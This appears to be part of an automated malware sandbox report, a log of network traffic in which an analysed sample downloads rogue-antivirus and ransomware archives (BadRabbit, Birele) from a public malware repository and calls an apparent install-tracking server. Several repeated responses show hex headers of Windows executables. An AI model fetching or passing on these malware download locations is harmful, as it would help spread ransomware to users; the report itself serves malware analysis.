          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:40 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:40 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:41 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:42 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:42 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:42 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:52:43 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 